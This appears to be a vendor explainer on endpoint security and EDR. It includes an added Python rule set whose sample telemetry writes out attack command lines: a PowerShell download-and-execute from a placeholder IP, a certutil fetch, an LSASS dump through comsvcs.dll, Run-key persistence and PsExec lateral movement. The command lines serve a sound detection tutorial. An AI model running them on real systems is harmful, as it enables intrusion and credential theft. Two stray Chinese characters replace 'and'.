What Is Endpoint Security?

Endpoint security is the practice of securing, in real time, every device that accesses a corporate network. Any single unprotected device is a weak link with the potential to affect the entire network, which is why endpoint security is so critical to an overall cybersecurity program.

According to Gartner, endpoint protection platforms (EPPs) provide the facility to deploy agents or sensors to secure managed endpoints, including desktop PCs, laptops, servers, and mobile devices.

What Is an Endpoint?

An endpoint is any device or server that connects to a network. Beyond those mentioned above (desktop PCs, laptops, servers, mobile devices), endpoints include phones, internet of things (IoT) devices such as kitchen appliances or thermostats, cameras, and anything else that can join a network and send or receive data.

We rarely think of all of these devices, especially the ones we use in our personal lives, as potentially insecure, yet somebody somewhere has the job of protecting each device together with the rest of the network it reaches. Complicating matters, devices used for work routinely bleed into personal life, and vice versa.

For example, if you have work apps like Slack or Google Workspace on your personal phone, your corporate administrators may require you to install certain identity and access management (IAM) apps like Okta or Duo to protect those specific work applications connecting to your corporate network.

What Is an Endpoint Protection Platform (EPP)?

An EPP is a platform that deploys monitoring agents to combat malware and other attacks on every endpoint across an organization's network. EPPs are generally very good at doing what they say: protecting an endpoint. However, further-reaching solutions are required to take a broader, whole-network stance on protection.

What Is Endpoint Detection and Response (EDR)?

EDR solutions provide visibility and insight to close security gaps by identifying and reporting on real-time risk, testing defenses, and, most importantly, detecting endpoint compromise. An EDR solution should be able to proactively identify and prioritize weak points across a network and its users.

EPP vs. EDR

The fundamental difference between EPP and EDR is prevention versus detection of an intrusion or attack. An EPP leverages agents to prevent malicious file execution on endpoints with technology like next-generation antivirus (NGAV); an EDR solution records endpoint telemetry so that activity which slips past prevention can still be detected, investigated, and contained.

Modern EDR solutions usually incorporate extended detection and response (XDR) capabilities to go beyond simple detection and response (D&R), giving single-pane-of-glass coverage fed by both endpoint telemetry and broader data collected from beyond the perimeter. This can vastly improve an organization's ability to detect incidents earlier in the attack chain and to shut down attacks before any, or very little, damage is done.

How Does Endpoint Security Work?

Endpoint security works by having an EPP continuously monitor for suspicious activity and alert administrators to a possible breach. A sensor or agent installed on an endpoint securely streams telemetry from that endpoint to the centralized EPP so that it can be analyzed and, if necessary, mitigating actions can be taken. The following types of attacker activity leave distinctive traces in endpoint data, and each points to an appropriate response:

  • Malware installation: Malware is installed differently from normal software, for example by being dropped into and run from a user-writable directory rather than through an installer.
  • Malware persistence: There are only a finite number of ways malware can persist on a system (run keys, scheduled tasks, services, startup folders, and the like), so those locations can be watched.
  • Attacker issues commands: Attackers tend to interact with a target system through an operating-system shell, so a shell spawned by an unexpected parent process is a strong signal.
  • Attacker steals credentials: Prior to lateral movement, an attacker needs credentials, which on Windows usually means reading LSASS memory or dumping cached secrets.
  • Attacker downloads additional tools: Attackers typically bring a toolkit with them, often fetched with the operating system's own download utilities.
  • Attacker moves laterally to another asset: Attackers jump to other assets on the network in the hope of gathering more data en route to their ultimate target.
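The six stages above map directly onto detection rules over process-creation telemetry. What follows is an added example, not code from the original page or from Rapid7's products: a small Python rule set run over constructed sample events. The host names, user names, paths, timestamps and the 198.51.100.7 address are all made up for illustration, and the rules are deliberately narrow so that the logic stays readable. Each rule keys on one of the stages listed, and the per-host chain the code reconstructs is the raw material for the post-breach questions below.

```python
"""Rule-based detection over constructed endpoint process telemetry (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record, as an endpoint agent would stream it to the EPP."""
    ts: str        # ISO-8601 UTC timestamp; sortable as a plain string
    host: str
    user: str
    parent: str    # full path of the parent process image
    image: str     # full path of the new process image
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Stage 1: executables started out of user-writable staging directories, not via an installer.
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData\\Local\\Temp)\\", re.I)
# Stage 2: a few of the finite persistence locations (Run keys, scheduled tasks, services).
PERSIST = re.compile(r"CurrentVersion\\Run|\bschtasks(\.exe)?\s+/create|\bsc(\.exe)?\s+create", re.I)
# Stage 4: LSASS memory access and well-known credential-dumping tooling.
CRED_THEFT = re.compile(r"lsass|mimikatz|sekurlsa|comsvcs\.dll,?\s*MiniDump", re.I)
# Stage 5: built-in downloaders an attacker uses to fetch a toolkit.
TOOL_FETCH = re.compile(r"\bcertutil(\.exe)?\s+-urlcache|\bbitsadmin(\.exe)?\s+/transfer"
                        r"|Invoke-WebRequest|DownloadString|DownloadFile", re.I)
# Stage 6: remote execution against another host.
LATERAL = re.compile(r"\bpsexec(\.exe)?\s+\\\\|\bwmic(\.exe)?\s+/node:|\bwinrs(\.exe)?\s+-r:"
                     r"|Enter-PSSession|Invoke-Command\s+-ComputerName", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Return the attack stages an event matches: possibly several, usually none."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent)
    if img.endswith(".exe") and USER_WRITABLE.search(ev.image):
        hits.append("malware_install")
    if PERSIST.search(ev.cmdline):
        hits.append("persistence")
    if parent in OFFICE_APPS and img in SHELLS:   # stage 3: document viewer spawning a shell
        hits.append("attacker_commands")
    if CRED_THEFT.search(ev.cmdline):
        hits.append("credential_theft")
    if TOOL_FETCH.search(ev.cmdline):
        hits.append("tool_download")
    if LATERAL.search(ev.cmdline):
        hits.append("lateral_movement")
    return hits


def detect(events) -> list[tuple[str, str, str, str]]:
    """Run every rule over every event; (host, ts, stage, cmdline) tuples in time order."""
    return [(ev.host, ev.ts, stage, ev.cmdline)
            for ev in sorted(events, key=lambda e: (e.ts, e.host))
            for stage in classify(ev)]


def attack_chain(events) -> dict[str, list[str]]:
    """Per host, the stages in the order first observed: the 'where did they go' view."""
    chain: dict[str, list[str]] = {}
    for host, _ts, stage, _cmd in detect(events):
        stages = chain.setdefault(host, [])
        if stage not in stages:
            stages.append(stage)
    return chain


def entry_point(events):
    """Earliest detection anywhere: the first answer to 'how did the attacker get in?'"""
    hits = detect(events)
    return hits[0][:3] if hits else None


# Constructed sample telemetry (hosts, users, paths, timestamps and the documentation-range
# address 198.51.100.7 are invented): ws-01 is phished, fs-02 is the lateral target,
# and ws-07 is a clean host that exercises the near-miss paths.
W = r"C:\Windows\System32"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
DROP = r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe"
SAMPLE_EVENTS = [
    ProcessEvent("2024-05-01T09:12:01Z", "ws-01", r"CORP\jdoe", r"C:\Windows\explorer.exe", OFFICE,
                 "WINWORD.EXE /n invoice.docm"),
    ProcessEvent("2024-05-01T09:12:40Z", "ws-01", r"CORP\jdoe", OFFICE, W + r"\cmd.exe",
                 "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://198.51.100.7/s')\""),
    ProcessEvent("2024-05-01T09:12:55Z", "ws-01", r"CORP\jdoe", W + r"\cmd.exe", DROP, "svchost.exe -k netsvcs"),
    ProcessEvent("2024-05-01T09:13:10Z", "ws-01", r"CORP\jdoe", DROP, W + r"\reg.exe",
                 r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d " + DROP),
    ProcessEvent("2024-05-01T09:20:05Z", "ws-01", r"CORP\jdoe", DROP, W + r"\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 612 C:\Users\jdoe\AppData\Local\Temp\l.dmp full"),
    ProcessEvent("2024-05-01T09:31:47Z", "ws-01", r"CORP\jdoe", DROP, r"C:\Users\Public\tools\PsExec.exe",
                 r"PsExec.exe \\fs-02 -u CORP\svc_backup cmd.exe"),
    ProcessEvent("2024-05-01T09:31:52Z", "fs-02", r"CORP\svc_backup", W + r"\PSEXESVC.exe", W + r"\cmd.exe", "cmd.exe"),
    ProcessEvent("2024-05-01T09:32:30Z", "fs-02", r"CORP\svc_backup", W + r"\cmd.exe", W + r"\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Windows\Temp\x.exe"),
    ProcessEvent("2024-05-01T09:40:00Z", "ws-07", r"CORP\asmith", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Mozilla Firefox\firefox.exe", "firefox.exe"),
    ProcessEvent("2024-05-01T10:02:11Z", "ws-07", r"CORP\asmith", W + r"\cmd.exe", W + r"\schtasks.exe",
                 "schtasks.exe /query /fo LIST"),
]

if __name__ == "__main__":
    for host, stages in attack_chain(SAMPLE_EVENTS).items():
        print(f"{host}: {' -> '.join(stages)}")
    print("entry point:", entry_point(SAMPLE_EVENTS))
```

Run stand-alone, the script prints the reconstructed chain for ws-01 (shell from a document, tool download, drop in Temp, Run-key persistence, LSASS dump via comsvcs.dll, PsExec to fs-02), the single download detection on fs-02, and nothing for ws-07, whose `schtasks /query` is benign and is not matched. Note that `classify` returns several stages for one event when one command line does several things, and that the rules look only at the fields a real agent would provide (parent, image path, command line); a production rule set would add many more persistence locations and downloaders, and would tune each rule against the organization's own baseline to keep false positives down.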

Securing systems against future attacks means asking post-breach questions during the investigation:

  • How did the attacker get in?
  • What tools did the attacker use?
  • Where did the attacker move?
  • What credentials were used?
  • What data did the attacker have access to?
  • What data was stolen?
  • Is the attacker still in the environment?
  • What specific remediation steps can you take?
  • What can you do to prevent these kinds of attacks from happening in the future?

Monitoring, D&R actions, and investigations all take place from a central location or dashboard within the EPP. If a breach of one of the types listed above did occur, security personnel can execute tasks such as blocking malware, detecting vulnerabilities, remotely isolating or disabling assets and/or endpoints to contain the fallout, and more.

Key Components to Look for in an Endpoint Security Solution

Each business and its security organization has different needs, but the big commonality is the technology we all depend on to do our jobs. With that in mind, here are some components no endpoint security solution should be without.

Endpoint Visibility

The number and types of devices accessing company data and applications have grown exponentially over the past decade. This is due in large part to the pandemic, but also to the general adoption of technology that lets companies hire talent from outside their immediate geographic area. In this environment, it is an understatement to say endpoint visibility is critical.

Digital forensics 和 incident response (DFIR) tools can be critical in helping security teams quickly collect 和 view digital forensic evidence from across endpoints as well as proactively monitor them for suspicious activity. 

Expanded Reach

With the decentralization of the workforce described above, it is generally accepted that endpoint agents are no longer optional. Security programs must be able to reach into any endpoint at any time to be effective against threats. Endpoint agents should have EDR capabilities: recording key system events, acquiring investigative data in real time, NGAV that can terminate threats based on behavior, proactive threat defense, and on-demand mitigation and remediation.

People must also broaden their capabilities, which means end-user education should be a key part of a security program's investment strategy. The dollar cost of end-user security education is tiny compared with the cost of technology, headcount, and the costs associated with a breach. Security awareness training can be tailored to an organization based on the types of threats prevalent in its industry.

Next-Generation Antivirus (NGAV)

NGAV goes beyond traditional antivirus to widen the view of an organization's endpoints. An NGAV solution detects malware and fileless attacks in order to prevent attacker tactics, techniques, and procedures (TTPs) and malicious behavior, whether carried out deliberately or unwittingly by someone who is, in fact, properly credentialed.

NGAV blocks malicious code hiding within processes from executing even when that code has never been seen or signatured before. By leveraging artificial intelligence (AI), machine learning (ML), and other capabilities, NGAV can learn from the past behavior of the endpoints on which it is installed, and can then more efficiently block diverse attacks across the entire endpoint ecosystem.

Why Is Endpoint Security Important?

Endpoint security is important because it helps pinpoint and reduce risk across an organization. Real-time threat detection, monitoring of remote and virtual infrastructure, and rapid agent deployment are just a few of the benefits endpoint security brings.

Endpoint security strategy is also changing, going, as discussed above, beyond the endpoint to become a key part of a larger XDR program. This matters if security organizations wish to become more proactive, detecting the signals of an impending attack and shutting it down before any damage is done.

Every employee interacts with multiple endpoints every day, including personal devices used for work, hopping on and off the corporate network. A robust monitoring and D&R program helps keep that ecosystem of assets shielded from ever-more-sophisticated breaches, lateral movement, and data theft.

Read More About Endpoint Security

Endpoint Security: Latest Rapid7 Blog Posts

Use Case: Unify Endpoint Assessment